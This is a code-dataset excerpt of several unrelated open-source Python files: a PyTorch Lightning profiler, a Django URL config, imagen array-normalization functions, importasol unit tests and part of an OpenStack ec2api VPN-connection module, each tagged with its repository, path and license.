        self._sort_by_key = sort_by_key or f"{'cuda' if profiler_kwargs.get('use_cuda', False) else 'cpu'}_time_total"
        self._user_record_functions = record_functions or set()
        self._record_functions_start = self._user_record_functions | self.START_RECORD_FUNCTIONS
        self._record_functions = self._user_record_functions | self.RECORD_FUNCTIONS
        self._record_module_names = record_module_names
        self._profiler_kwargs = profiler_kwargs

        self.profiler: Optional[_PROFILER] = None
        self.function_events: Optional["EventList"] = None
        self._lightning_module: Optional["LightningModule"] = None  # set by ProfilerConnector
        self._register: Optional[RegisterRecordFunction] = None
        self._parent_profiler: Optional[_PROFILER] = None
        self._recording_map: Dict[str, record_function] = {}
        self._start_action_name: Optional[str] = None
        self._schedule: Optional[ScheduleWrapper] = None

        if _KINETO_AVAILABLE:
            self._init_kineto(profiler_kwargs)

        if self._sort_by_key not in self.AVAILABLE_SORT_KEYS:
            raise MisconfigurationException(
                f"Found sort_by_key: {self._sort_by_key}. Should be within {self.AVAILABLE_SORT_KEYS}. "
            )

    def _init_kineto(self, profiler_kwargs: Any) -> None:
        """Validate and normalize kineto-specific kwargs (schedule, activities, export options)."""
        has_schedule = "schedule" in profiler_kwargs
        self._has_on_trace_ready = "on_trace_ready" in profiler_kwargs

        schedule = profiler_kwargs.get("schedule", None)
        if schedule is not None:
            if not isinstance(schedule, Callable):
                raise MisconfigurationException(f"Schedule should be a callable. Found: {schedule}")
            # Probe the schedule once to validate its return type.
            action = schedule(0)
            if not isinstance(action, ProfilerAction):
                raise MisconfigurationException(
                    f"Schedule should return a `torch.profiler.ProfilerAction`. Found: {action}"
                )
        # Fall back to the default schedule only when the user passed none at all;
        # an explicit `schedule=None` disables scheduling.
        schedule = schedule if has_schedule else self._default_schedule()
        self._schedule = ScheduleWrapper(schedule) if schedule is not None else schedule
        self._profiler_kwargs["schedule"] = self._schedule

        activities = profiler_kwargs.get("activities", None)
        self._profiler_kwargs["activities"] = activities or self._default_activities()
        self._export_to_flame_graph = profiler_kwargs.get("export_to_flame_graph", False)
        self._metric = profiler_kwargs.get("metric", "self_cpu_time_total")
        # Flame-graph export requires stack recording.
        with_stack = profiler_kwargs.get("with_stack", False) or self._export_to_flame_graph
        self._profiler_kwargs["with_stack"] = with_stack

    @staticmethod
    def _default_schedule() -> Optional[callable]:
        """Return the default kineto schedule, or None when kineto is unavailable."""
        if _KINETO_AVAILABLE:
            # Those schedule defaults allow the profiling overhead to be negligible over training time.
            return torch.profiler.schedule(wait=1, warmup=1, active=3)

    def _default_activities(self) -> List["ProfilerActivity"]:
        """Return the activities to profile (CPU and, when available, CUDA)."""
        activities = []
        if not _KINETO_AVAILABLE:
            return activities
        if self._profiler_kwargs.get("use_cpu", True):
            activities.append(ProfilerActivity.CPU)
        if self._profiler_kwargs.get("use_cuda", torch.cuda.is_available()):
            activities.append(ProfilerActivity.CUDA)
        return activities

    def start(self, action_name: str) -> None:
        """Lazily open the profiler and a `record_function` label for ``action_name``."""
        if self.profiler is None and action_name in self._record_functions_start:

            # close profiler if it is already opened. might happen if 2 profilers
            # are created and the first one did not call `describe`
            try:
                torch.autograd._disable_profiler()
            except (AttributeError, RuntimeError):
                pass

            if self._schedule is not None:
                self._schedule.setup(action_name)

            self._create_profilers()

            profiler = self.profiler.__enter__()
            if profiler is not None:
                self.profiler = profiler

            if self._parent_profiler is not None:
                self._parent_profiler.__enter__()

            if self._register is not None:
                self._register.__enter__()

        if (
            self.profiler is not None
            and (action_name in self._record_functions or action_name.startswith(self.RECORD_FUNCTION_PREFIX))
            and action_name not in self._recording_map
        ):
            recording = record_function(action_name)
            recording.__enter__()
            self._recording_map[action_name] = recording

    def stop(self, action_name: str) -> None:
        """Close the label for ``action_name`` and, for step actions, advance the kineto profiler."""
        if action_name in self._recording_map:
            self._recording_map[action_name].__exit__(None, None, None)
            del self._recording_map[action_name]

        if not _KINETO_AVAILABLE or self._emit_nvtx:
            return

        if self.profiler is not None and (
            action_name in self.STEP_FUNCTIONS or action_name.startswith(self.STEP_FUNCTION_PREFIX)
        ):
            if self._schedule is not None:
                self._schedule.pre_step(action_name)

            def on_trace_ready(profiler):
                if self.dirpath is not None:
                    if self._export_to_chrome:
                        handler = tensorboard_trace_handler(
                            self.dirpath, self._prepare_filename(action_name=action_name, extension="")
                        )
                        handler(profiler)

                    if self._export_to_flame_graph:
                        path = os.path.join(
                            self.dirpath, self._prepare_filename(action_name=action_name, extension=".stack")
                        )
                        profiler.export_stacks(path, metric=self._metric)
                else:
                    rank_zero_warn("The PyTorchProfiler failed to export trace as `dirpath` is None")

            if not self._has_on_trace_ready:
                self.profiler.on_trace_ready = on_trace_ready

            if self._schedule is not None:
                self.profiler.step_num = self._schedule.num_step
            self.profiler.step()

    def summary(self) -> str:
        """Return the formatted profiling table (empty when disabled or emitting NVTX)."""
        if not self._profiler_kwargs.get("enabled", True) or self._emit_nvtx:
            return ""

        self._delete_profilers()

        if not self.function_events:
            return ""

        if self._export_to_chrome and not _KINETO_AVAILABLE:
            filename = f"{self.local_rank}_trace.json"
            path_to_trace = filename if self.dirpath is None else os.path.join(self.dirpath, filename)
            self.function_events.export_chrome_trace(path_to_trace)

        data = self.function_events.key_averages(group_by_input_shapes=self._group_by_input_shapes)
        table = data.table(sort_by=self._sort_by_key, row_limit=self._row_limit)

        recorded_stats = {"records": table}
        return self._stats_to_str(recorded_stats)

    def _create_profilers(self) -> None:
        """Instantiate the (parent) profiler objects for the selected mode."""
        if self._emit_nvtx:
            self._parent_profiler = self._create_profiler(torch.cuda.profiler.profile)
            self.profiler = self._create_profiler(torch.autograd.profiler.emit_nvtx)
        else:
            self._parent_profiler = None
            self.profiler = self._create_profiler(
                torch.profiler.profile if _KINETO_AVAILABLE else torch.autograd.profiler.profile
            )
        if self._record_module_names and self._lightning_module is not None:
            self._register = RegisterRecordFunction(self._lightning_module)

    def _create_profiler(self, profiler: Type[_PROFILER]) -> _PROFILER:
        """Instantiate ``profiler``, forwarding only the kwargs its __init__ accepts."""
        init_parameters = inspect.signature(profiler.__init__).parameters
        kwargs = {k: v for k, v in self._profiler_kwargs.items() if k in init_parameters}
        return profiler(**kwargs)

    def _cache_functions_events(self) -> None:
        """Snapshot the profiler's events so they survive profiler deletion."""
        if self._emit_nvtx:
            return
        self.function_events = self.profiler.events() if _KINETO_AVAILABLE else self.profiler.function_events

    def _delete_profilers(self) -> None:
        """Close and drop the profiler objects, caching their events first."""
        if self.profiler is not None:
            self.profiler.__exit__(None, None, None)
            self._cache_functions_events()
            self.profiler = None

        if self._schedule is not None:
            self._schedule.reset()

        if self._parent_profiler is not None:
            self._parent_profiler.__exit__(None, None, None)
            self._parent_profiler = None

        if self._register is not None:
            self._register.__exit__(None, None, None)
            self._register = None

    def teardown(self, stage: Optional[str] = None) -> None:
        """Tear down the profiler and close any still-open recordings."""
        self._delete_profilers()

        # Iterate over a snapshot: `stop()` deletes entries from
        # `_recording_map`, and mutating a dict while iterating it raises
        # RuntimeError in Python 3.
        for k in list(self._recording_map):
            self.stop(k)
        self._recording_map = {}

        super().teardown(stage=stage)
| williamFalcon/pytorch-lightning | pytorch_lightning/profiler/pytorch.py | Python | apache-2.0 | 20,415 |
from django.conf.urls import patterns, include, url

# URL routes for the article app.  Views are referenced by dotted-path
# strings (the pre-Django-1.10 style; `patterns` and `include` are imported
# but unused here).
urlpatterns = [
    # All articles.
    url(r'^all/', 'article.views.articles'),
    # A single article, selected by numeric id.
    url(r'^get/(?P<article_id>\d+)/$', 'article.views.article'),
    # Articles filtered by language code (e.g. "en", "pt-br").
    url(r'^language/(?P<language>[a-z\-]+)/$', 'article.views.language'),
]
| TheProphet007/BLOG-Django- | article/urls.py | Python | gpl-3.0 | 248 |
"""
TransferFns: accept and modify a 2d array
$Id$
"""
__version__='$Revision$'
import numpy
import param
class TransferFn(param.Parameterized):
    """
    Function object to modify a matrix in place, e.g. for normalization.

    Used for transforming an array of intermediate results into a
    final version, by cropping it, normalizing it, squaring it, etc.

    Objects in this class must support being called as a function with
    one matrix argument, and are expected to change that matrix in place.
    """
    __abstract = True

    # Target norm used by normalizing subclasses; ignored by the others.
    # CEBALERT: can we have this here - is there a more appropriate
    # term for it, general to output functions?  JAB: Please do rename it!
    norm_value = param.Parameter(default=None)

    def __call__(self,x):
        # Subclasses must implement in-place modification of `x`.
        raise NotImplementedError
# Trivial example of a TransferFn, provided for when a default
# is needed. The other concrete OutputFunction classes are stored
# in transferfn/, to be imported as needed.
class IdentityTF(TransferFn):
    """
    Identity function, returning its argument as-is.

    For speed, calling this function object is sometimes optimized
    away entirely.  To make this feasible, it is not allowable to
    derive other classes from this object, modify it to have different
    behavior, add side effects, or anything of that nature.
    """
    def __call__(self,x,sum=None):
        # Deliberately a no-op; the `sum` argument is accepted for
        # call-site compatibility and ignored.
        pass
class Threshold(TransferFn):
    """
    Forces all values below a threshold to zero, and leaves others unchanged.
    """

    threshold = param.Number(default=0.25, doc="""
        Decision point for determining values to clip.""")

    def __call__(self,x):
        # Zero out entries below the threshold, in place, as documented.
        # The previous implementation called the undefined name `minimum`
        # (only `numpy` is imported), raising NameError; numpy.minimum
        # would also have clamped values *above* the threshold instead of
        # zeroing those below it.
        x *= (x >= self.threshold)
class BinaryThreshold(TransferFn):
    """
    Forces all values below a threshold to zero, and above it to 1.0.
    """

    threshold = param.Number(default=0.25, doc="""
        Decision point for determining binary value.""")

    def __call__(self,x):
        # Compute the mask first, then overwrite `x` in place so the
        # caller's array object is modified rather than rebound.
        is_high = x >= self.threshold
        x *= 0.0
        x += is_high
class DivisiveNormalizeL1(TransferFn):
    """
    TransferFn that divides an array by its L1 norm.

    Rescales the array in place so that the sum of its absolute values
    equals ``norm_value``; an all-zero array is left untouched.  For
    non-negative arrays with at least one non-zero entry this is a
    divisive sum normalization.
    """
    norm_value = param.Number(default=1.0)

    def __call__(self,x):
        """L1-normalize the input array, if it has a nonzero sum."""
        l1 = 1.0*numpy.sum(abs(x.ravel()))
        if l1 != 0:
            x *= (self.norm_value/l1)
class DivisiveNormalizeL2(TransferFn):
    """
    TransferFn to divide an array by its Euclidean length (aka its L2 norm).

    Treats the array as a flattened vector and rescales it in place so its
    Euclidean length equals ``norm_value``; a zero vector is left untouched.
    """
    norm_value = param.Number(default=1.0)

    def __call__(self,x):
        flat = x.ravel()
        length = 1.0*numpy.sqrt(numpy.dot(flat,flat))
        if length != 0:
            x *= (self.norm_value/length)
class DivisiveNormalizeLinf(TransferFn):
    """
    TransferFn to divide an array by its L-infinity norm
    (i.e. the maximum absolute value of its elements).

    Rescales the array in place so that its largest absolute value equals
    ``norm_value``; an all-zero array is left untouched.  The L-infinity
    norm is also known as the divisive infinity norm and Chebyshev norm.
    """
    norm_value = param.Number(default=1.0)

    def __call__(self,x):
        peak = 1.0*(numpy.abs(x)).max()
        if peak != 0:
            x *= (self.norm_value/peak)
def norm(v,p=2):
    """
    Returns the Lp norm of v, where p is an arbitrary number defaulting to 2.
    """
    total = numpy.sum(numpy.abs(v)**p)
    return total**(1.0/p)
class DivisiveNormalizeLp(TransferFn):
    """
    TransferFn to divide an array by its Lp-Norm, where p is specified.

    Treats the array as a flattened vector and rescales it in place so its
    Lp-norm equals ``norm_value``.  Faster dedicated versions exist for the
    common L1 and L2 cases; the default p=2 matches DivisiveNormalizeL2.
    """
    p = param.Number(default=2)
    norm_value = param.Number(default=1.0)

    def __call__(self,x):
        lp = 1.0*norm(x.ravel(),self.p)
        if lp != 0:
            x *= (self.norm_value/lp)
| ioam/svn-history | imagen/transferfn.py | Python | bsd-3-clause | 4,774 |
import unittest
from decimal import Decimal
from importasol.entorno import EntornoSOL
from fields import TestFile
from importasol.db.contasol import APU, Asiento
from StringIO import StringIO
class TestEntorno(unittest.TestCase):
    """Unit tests for EntornoSOL binding, Asiento linking, events and XLS output."""
    def test_entorno(self):
        """Binding an object sets its `entorno`; unbinding clears it."""
        e = EntornoSOL()
        f1 = TestFile()
        e.bind(f1)
        self.assertEqual(e, f1.entorno)
        e.unbind(f1)
        self.assertEqual(None, f1.entorno)
    def test_asiento(self):
        """vincular/desvincular on an Asiento (un)binds all of its APU entries."""
        e = EntornoSOL()
        # A balanced accounting entry: 1000 - 500 - 500 == 0.
        ap1 = APU()
        ap1.euros = 1000
        ap2 = APU()
        ap2.euros = -500
        ap3 = APU()
        ap3.euros = -500
        asi = Asiento(apuntes=[ap1, ap2, ap3])
        asi.vincular(e)
        self.assertListEqual([e, e, e],
                             [ap1.entorno, ap2.entorno, ap3.entorno])
        asi.desvincular()
        self.assertListEqual([None, None, None],
                             [ap1.entorno, ap2.entorno, ap3.entorno])
    def test_eventos(self):
        """on_pre_bind / on_pre_unbind callbacks fire with the affected object."""
        def on_bind(tipo, entorno, obj):
            obj.manipulated = 1
        def on_unbind(tipo, entorno, obj):
            obj.manipulated = 2
        e = EntornoSOL()
        e.on_pre_bind += on_bind
        e.on_pre_unbind += on_unbind
        ap1 = APU()
        ap1.manipulated = 0
        ap1.euros = 1000
        e.bind(ap1)
        self.assertEqual(1, ap1.manipulated)
        e.unbind(ap1)
        self.assertEqual(ap1.manipulated, 2)
    def test_generacion_xls(self):
        """generar_xls_table writes the APU table to a file-like object."""
        e = EntornoSOL()
        ap1 = APU()
        ap1.euros = 1000
        ap2 = APU()
        ap2.euros = -500
        ap3 = APU()
        ap3.euros = -500
        asi = Asiento(apuntes=[ap1, ap2, ap3])
        asi.vincular(e)
        f = StringIO()
        # NOTE(review): no assertion on the generated content — this only
        # verifies that generation does not raise.
        e.generar_xls_table('APU', f)
| telenieko/importasol | tests/entorno.py | Python | bsd-3-clause | 1,729 |
# Copyright 2014
# The Cloudscaling Group, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import string
from lxml import etree
import netaddr
from neutronclient.common import exceptions as neutron_exception
from oslo_log import log as logging
import six
from ec2api.api import common
from ec2api.api import ec2utils
from ec2api import clients
from ec2api.db import api as db_api
from ec2api import exception
from ec2api.i18n import _
LOG = logging.getLogger(__name__)
"""VPN connections related API implementation
"""
Validator = common.Validator
SHARED_KEY_CHARS = string.ascii_letters + '_.' + string.digits
AWS_MSS = 1387
MTU_MSS_DELTA = 40 # 20 byte IP and 20 byte TCP headers
def create_vpn_connection(context, customer_gateway_id, vpn_gateway_id,
                          type, options=None):
    """Create a VPN connection between a customer gateway and a VPN gateway.

    Mirrors EC2 CreateVpnConnection.  Only static routing is supported, so
    ``options['static_routes_only']`` must be True.  Creates neutron IKE and
    IPsec policies (renamed after the new item's EC2 id), stores the item in
    the DB, and resets the gateway's site connections.  Returns the formatted
    ``vpnConnection`` dict.
    """
    if not options or options.get('static_routes_only') is not True:
        raise exception.Unsupported('BGP dynamic routing is unsupported')
    customer_gateway = ec2utils.get_db_item(context, customer_gateway_id)
    vpn_gateway = ec2utils.get_db_item(context, vpn_gateway_id)
    # A customer gateway can participate in at most one VPN connection.
    vpn_connection = next(
        (vpn for vpn in db_api.get_items(context, 'vpn')
         if vpn['customer_gateway_id'] == customer_gateway_id),
        None)
    if vpn_connection:
        if vpn_connection['vpn_gateway_id'] == vpn_gateway_id:
            # Same pair already connected: idempotently return the existing one.
            ec2_vpn_connections = describe_vpn_connections(
                context, vpn_connection_id=[vpn_connection['id']])
            return {
                'vpnConnection': ec2_vpn_connections['vpnConnectionSet'][0]}
        else:
            raise exception.InvalidCustomerGatewayDuplicateIpAddress()
    neutron = clients.neutron(context)
    with common.OnCrashCleaner() as cleaner:
        # Phase 1 (IKE) policy with fixed defaults.
        os_ikepolicy = {'ike_version': 'v1',
                        'auth_algorithm': 'sha1',
                        'encryption_algorithm': 'aes-128',
                        'pfs': 'group2',
                        'phase1_negotiation_mode': 'main',
                        'lifetime': {'units': 'seconds',
                                     'value': 28800}}
        os_ikepolicy = neutron.create_ikepolicy(
            {'ikepolicy': os_ikepolicy})['ikepolicy']
        cleaner.addCleanup(neutron.delete_ikepolicy, os_ikepolicy['id'])
        # Phase 2 (IPsec) policy with fixed defaults.
        os_ipsecpolicy = {'transform_protocol': 'esp',
                          'auth_algorithm': 'sha1',
                          'encryption_algorithm': 'aes-128',
                          'pfs': 'group2',
                          'encapsulation_mode': 'tunnel',
                          'lifetime': {'units': 'seconds',
                                       'value': 3600}}
        os_ipsecpolicy = neutron.create_ipsecpolicy(
            {'ipsecpolicy': os_ipsecpolicy})['ipsecpolicy']
        cleaner.addCleanup(neutron.delete_ipsecpolicy, os_ipsecpolicy['id'])
        # Random 32-character pre-shared key for the tunnels.
        # NOTE(review): uses `random`, not a CSPRNG — consider
        # random.SystemRandom or the secrets module for key material.
        psk = ''.join(random.choice(SHARED_KEY_CHARS) for _x in range(32))
        vpn_connection = db_api.add_item(
            context, 'vpn',
            {'customer_gateway_id': customer_gateway['id'],
             'vpn_gateway_id': vpn_gateway['id'],
             'pre_shared_key': psk,
             'os_ikepolicy_id': os_ikepolicy['id'],
             'os_ipsecpolicy_id': os_ipsecpolicy['id'],
             'cidrs': [],
             'os_ipsec_site_connections': {}})
        cleaner.addCleanup(db_api.delete_item, context, vpn_connection['id'])
        # Rename the policies after the now-known EC2 id for traceability.
        neutron.update_ikepolicy(
            os_ikepolicy['id'], {'ikepolicy': {'name': vpn_connection['id']}})
        neutron.update_ipsecpolicy(
            os_ipsecpolicy['id'],
            {'ipsecpolicy': {'name': vpn_connection['id']}})
        _reset_vpn_connections(context, neutron, cleaner,
                               vpn_gateway, vpn_connections=[vpn_connection])
    ec2_vpn_connections = describe_vpn_connections(
        context, vpn_connection_id=[vpn_connection['id']])
    return {
        'vpnConnection': ec2_vpn_connections['vpnConnectionSet'][0]}
def create_vpn_connection_route(context, vpn_connection_id,
                                destination_cidr_block):
    """Add a static route (CIDR) to a VPN connection.

    Idempotent: returns True immediately if the CIDR is already present.
    Otherwise stores the CIDR on the DB item (with crash-rollback) and
    rebuilds the gateway's site connections.
    """
    vpn_connection = ec2utils.get_db_item(context, vpn_connection_id)
    if destination_cidr_block in vpn_connection['cidrs']:
        return True
    neutron = clients.neutron(context)
    vpn_gateway = db_api.get_item_by_id(context,
                                        vpn_connection['vpn_gateway_id'])
    with common.OnCrashCleaner() as cleaner:
        _add_cidr_to_vpn_connection_item(context, vpn_connection,
                                         destination_cidr_block)
        cleaner.addCleanup(_remove_cidr_from_vpn_connection_item,
                           context, vpn_connection, destination_cidr_block)
        _reset_vpn_connections(context, neutron, cleaner,
                               vpn_gateway, vpn_connections=[vpn_connection])
    return True
def delete_vpn_connection_route(context, vpn_connection_id,
                                destination_cidr_block):
    """Remove a static route (CIDR) from a VPN connection.

    Raises InvalidRouteNotFound when the CIDR is not attached.  Removes the
    CIDR from the DB item (with crash-rollback) and rebuilds the gateway's
    site connections.
    """
    vpn_connection = ec2utils.get_db_item(context, vpn_connection_id)
    if destination_cidr_block not in vpn_connection['cidrs']:
        raise exception.InvalidRouteNotFound(
            _('The specified route %(destination_cidr_block)s does not exist')
            % {'destination_cidr_block': destination_cidr_block})
    neutron = clients.neutron(context)
    vpn_gateway = db_api.get_item_by_id(context,
                                        vpn_connection['vpn_gateway_id'])
    with common.OnCrashCleaner() as cleaner:
        _remove_cidr_from_vpn_connection_item(context, vpn_connection,
                                              destination_cidr_block)
        cleaner.addCleanup(_add_cidr_to_vpn_connection_item,
                           context, vpn_connection, destination_cidr_block)
        _reset_vpn_connections(context, neutron, cleaner,
                               vpn_gateway, vpn_connections=[vpn_connection])
    return True
def delete_vpn_connection(context, vpn_connection_id):
    """Delete a VPN connection, its site connections, and its crypto policies.

    Policy deletion is best-effort: Conflict is logged and ignored, NotFound
    is silently ignored (already gone).
    """
    vpn_connection = ec2utils.get_db_item(context, vpn_connection_id)
    with common.OnCrashCleaner() as cleaner:
        db_api.delete_item(context, vpn_connection['id'])
        cleaner.addCleanup(db_api.restore_item, context, 'vpn', vpn_connection)
        neutron = clients.neutron(context)
        _stop_vpn_connection(neutron, vpn_connection)
        try:
            neutron.delete_ipsecpolicy(vpn_connection['os_ipsecpolicy_id'])
        except neutron_exception.Conflict as ex:
            # NOTE(review): `ex.message` is a neutronclient exception
            # attribute; plain Python 3 exceptions don't define it — confirm
            # against the pinned client version.
            LOG.warning('Failed to delete ipsecoplicy %(os_id)s during '
                        'deleting VPN connection %(id)s. Reason: %(reason)s',
                        {'id': vpn_connection['id'],
                         'os_id': vpn_connection['os_ipsecpolicy_id'],
                         'reason': ex.message})
        except neutron_exception.NotFound:
            pass
        try:
            neutron.delete_ikepolicy(vpn_connection['os_ikepolicy_id'])
        except neutron_exception.Conflict as ex:
            LOG.warning(
                'Failed to delete ikepolicy %(os_id)s during deleting '
                'VPN connection %(id)s. Reason: %(reason)s',
                {'id': vpn_connection['id'],
                 'os_id': vpn_connection['os_ikepolicy_id'],
                 'reason': ex.message})
        except neutron_exception.NotFound:
            pass
    return True
def describe_vpn_connections(context, vpn_connection_id=None, filter=None):
    """Return the EC2 DescribeVpnConnections response body."""
    connections = VpnConnectionDescriber().describe(
        context, ids=vpn_connection_id, filter=filter)
    return {'vpnConnectionSet': connections}
class VpnConnectionDescriber(common.TaggableItemsDescriber,
                             common.NonOpenstackItemsDescriber):
    """Describer mapping 'vpn' DB items to EC2 vpnConnection responses."""

    KIND = 'vpn'
    # EC2 filter name -> key (or key path) inside the formatted dict.
    FILTER_MAP = {'customer-gateway-configuration': (
                        'customerGatewayConfiguration'),
                  'customer-gateway-id': 'customerGatewayId',
                  'state': 'state',
                  'option.static-routes-only': ('options', 'staticRoutesOnly'),
                  'route.destination-cidr-block': ['routes',
                                                  'destinationCidrBlock'],
                  'type': 'type',
                  'vpn-connection-id': 'vpnConnectionId',
                  'vpn-gateway-id': 'vpnGatewayId'}

    def get_db_items(self):
        # Pre-fetch everything the formatter needs (customer gateways plus the
        # project's neutron IKE/IPsec policies and site connections) so that
        # format() does no per-item API calls.
        self.customer_gateways = {
            cgw['id']: cgw
            for cgw in db_api.get_items(self.context, 'cgw')}
        neutron = clients.neutron(self.context)
        self.os_ikepolicies = {
            ike['id']: ike
            for ike in neutron.list_ikepolicies(
                tenant_id=self.context.project_id)['ikepolicies']}
        self.os_ipsecpolicies = {
            ipsec['id']: ipsec
            for ipsec in neutron.list_ipsecpolicies(
                tenant_id=self.context.project_id)['ipsecpolicies']}
        self.os_ipsec_site_connections = {
            conn['id']: conn
            for conn in neutron.list_ipsec_site_connections(
                tenant_id=self.context.project_id)['ipsec_site_connections']}
        self.external_ips = _get_vpn_gateways_external_ips(
            self.context, neutron)
        return super(VpnConnectionDescriber, self).get_db_items()

    def format(self, vpn_connection):
        """Format one DB item using the caches built in get_db_items()."""
        return _format_vpn_connection(
            vpn_connection, self.customer_gateways, self.os_ikepolicies,
            self.os_ipsecpolicies, self.os_ipsec_site_connections,
            self.external_ips)
def _format_vpn_connection(vpn_connection, customer_gateways, os_ikepolicies,
                           os_ipsecpolicies, os_ipsec_site_connections,
                           external_ips):
    """Build the EC2 API dict for one VPN connection.

    All mapping arguments are id -> object caches fetched up front (see
    VpnConnectionDescriber.get_db_items).
    """
    config_dict = _format_customer_config(
        vpn_connection, customer_gateways, os_ikepolicies, os_ipsecpolicies,
        os_ipsec_site_connections, external_ips)
    # EC2 returns the customer gateway configuration as an XML string.
    config = ec2utils.dict_to_xml(config_dict, 'vpn_connection')
    config.attrib['id'] = vpn_connection['id']
    config_str = etree.tostring(config, xml_declaration=True, encoding='UTF-8',
                                pretty_print=True)
    # NOTE(review): state and type are hard-coded; apparently only
    # 'available' static-route ipsec.1 connections are represented.
    return {'vpnConnectionId': vpn_connection['id'],
            'vpnGatewayId': vpn_connection['vpn_gateway_id'],
            'customerGatewayId': vpn_connection['customer_gateway_id'],
            'state': 'available',
            'type': 'ipsec.1',
            'routes': [{'destinationCidrBlock': cidr,
                        'state': 'available'}
                       for cidr in vpn_connection['cidrs']],
            'vgwTelemetry': [],
            'options': {'staticRoutesOnly': True},
            'customerGatewayConfiguration': config_str}
def _format_customer_config(vpn_connection, customer_gateways, os_ikepolicies,
                            os_ipsecpolicies, os_ipsec_site_connections,
                            external_ips):
    """Assemble the dict serialized into customerGatewayConfiguration XML.

    Values are taken from a live Neutron ipsec site connection when one
    exists, otherwise from the stored VPN connection/customer gateway data.
    """
    customer_gateway = customer_gateways[vpn_connection['customer_gateway_id']]
    os_connections_ids = vpn_connection['os_ipsec_site_connections'].values()
    if os_connections_ids:
        # Pick the first stored connection id that is still known to
        # Neutron; stale ids are skipped.
        os_ipsec_site_connection = next(
            (os_ipsec_site_connections[conn_id]
             for conn_id in os_connections_ids
             if os_ipsec_site_connections.get(conn_id)),
            None)
    else:
        os_ipsec_site_connection = None
    # TODO(ft): figure out and add to the output tunnel internal addresses
    config_dict = {
        'customer_gateway_id': vpn_connection['customer_gateway_id'],
        'vpn_gateway_id': vpn_connection['vpn_gateway_id'],
        'vpn_connection_type': 'ipsec.1',
        'vpn_connection_attributes': 'NoBGPVPNConnection',
        'ipsec_tunnel': {
            'customer_gateway': {
                'tunnel_outside_address': {
                    'ip_address': (
                        os_ipsec_site_connection['peer_address']
                        if os_ipsec_site_connection else
                        customer_gateway['ip_address'])}},
            'vpn_gateway': {
                'tunnel_outside_address': {
                    'ip_address': external_ips.get(
                        vpn_connection['vpn_gateway_id'])}}},
    }
    # IKE section is only emitted when the policy still exists in Neutron.
    os_ikepolicy = os_ikepolicies.get(vpn_connection['os_ikepolicy_id'])
    if os_ikepolicy:
        config_dict['ipsec_tunnel']['ike'] = {
            'authentication_protocol': os_ikepolicy['auth_algorithm'],
            'encryption_protocol': os_ikepolicy['encryption_algorithm'],
            'lifetime': os_ikepolicy['lifetime']['value'],
            'perfect_forward_secrecy': os_ikepolicy['pfs'],
            'mode': os_ikepolicy['phase1_negotiation_mode'],
            'pre_shared_key': (
                os_ipsec_site_connection['psk']
                if os_ipsec_site_connection else
                vpn_connection['pre_shared_key']),
        }
    # Likewise, the IPsec section depends on a surviving Neutron policy.
    os_ipsecpolicy = os_ipsecpolicies.get(vpn_connection['os_ipsecpolicy_id'])
    if os_ipsecpolicy:
        config_dict['ipsec_tunnel']['ipsec'] = {
            'protocol': os_ipsecpolicy['transform_protocol'],
            'authentication_protocol': os_ipsecpolicy['auth_algorithm'],
            'encryption_protocol': os_ipsecpolicy['encryption_algorithm'],
            'lifetime': os_ipsecpolicy['lifetime']['value'],
            'perfect_forward_secrecy': os_ipsecpolicy['pfs'],
            'mode': os_ipsecpolicy['encapsulation_mode'],
            # MSS is derived from the live connection MTU when available,
            # otherwise the AWS default is reported.
            'tcp_mss_adjustment': (
                os_ipsec_site_connection['mtu'] - MTU_MSS_DELTA
                if os_ipsec_site_connection else
                AWS_MSS),
        }
    return config_dict
def _stop_vpn_connection(neutron, vpn_connection):
    """Delete every Neutron ipsec site connection backing *vpn_connection*.

    Connections already gone on the Neutron side are silently ignored.
    """
    subnet_to_connection = vpn_connection['os_ipsec_site_connections']
    for connection_id in six.itervalues(subnet_to_connection):
        try:
            neutron.delete_ipsec_site_connection(connection_id)
        except neutron_exception.NotFound:
            pass
def _stop_gateway_vpn_connections(context, neutron, cleaner, vpn_gateway):
    """Tear down OS site connections of every VPN on *vpn_gateway*.

    Registers undo callbacks with *cleaner* so that a failure in the
    surrounding operation restores the stored connection-id maps.
    """
    def undo_vpn_connection(context, vpn_connection, connections_ids):
        # Rollback path: put the dropped connection map back into the DB.
        vpn_connection['os_ipsec_site_connections'] = connections_ids
        db_api.update_item(context, vpn_connection)
    for vpn_connection in db_api.get_items(context, 'vpn'):
        if vpn_connection['vpn_gateway_id'] == vpn_gateway['id']:
            _stop_vpn_connection(neutron, vpn_connection)
            # Clear the map only after Neutron deletion so a crash in
            # between leaves the ids available for a retry.
            connection_ids = vpn_connection['os_ipsec_site_connections']
            vpn_connection['os_ipsec_site_connections'] = {}
            db_api.update_item(context, vpn_connection)
            cleaner.addCleanup(undo_vpn_connection, context, vpn_connection,
                               connection_ids)
def _update_vpn_routes(context, neutron, cleaner, route_table, subnets):
    """Re-sync VPN connections after a change to *route_table*.

    A no-op when the VPC has no attached VPN gateway.
    """
    gateway = ec2utils.get_attached_gateway(
        context, route_table['vpc_id'], 'vgw')
    if gateway:
        _reset_vpn_connections(context, neutron, cleaner, gateway,
                               route_tables=[route_table], subnets=subnets)
def _reset_vpn_connections(context, neutron, cleaner, vpn_gateway,
                           subnets=None, route_tables=None,
                           vpn_connections=None):
    """Recompute and apply per-subnet VPN site connections for a gateway.

    For every (subnet, vpn connection) pair, either creates/updates the
    Neutron ipsec site connection with the routable CIDRs, or deletes it
    when no CIDRs apply. Optional arguments narrow the scope; when omitted
    they are loaded from the DB for the gateway's VPC.
    """
    if not vpn_gateway['vpc_id']:
        return
    # TODO(ft): implement search filters in DB api
    vpn_connections = (vpn_connections or
                       [vpn for vpn in db_api.get_items(context, 'vpn')
                        if vpn['vpn_gateway_id'] == vpn_gateway['id']])
    if not vpn_connections:
        return
    subnets = (subnets or
               [subnet for subnet in db_api.get_items(context, 'subnet')
                if subnet['vpc_id'] == vpn_gateway['vpc_id']])
    if not subnets:
        return
    vpc = db_api.get_item_by_id(context, vpn_gateway['vpc_id'])
    customer_gateways = {cgw['id']: cgw
                         for cgw in db_api.get_items(context, 'cgw')}
    route_tables = route_tables or db_api.get_items(context, 'rtb')
    route_tables = {rtb['id']: rtb
                    for rtb in route_tables
                    if rtb['vpc_id'] == vpc['id']}
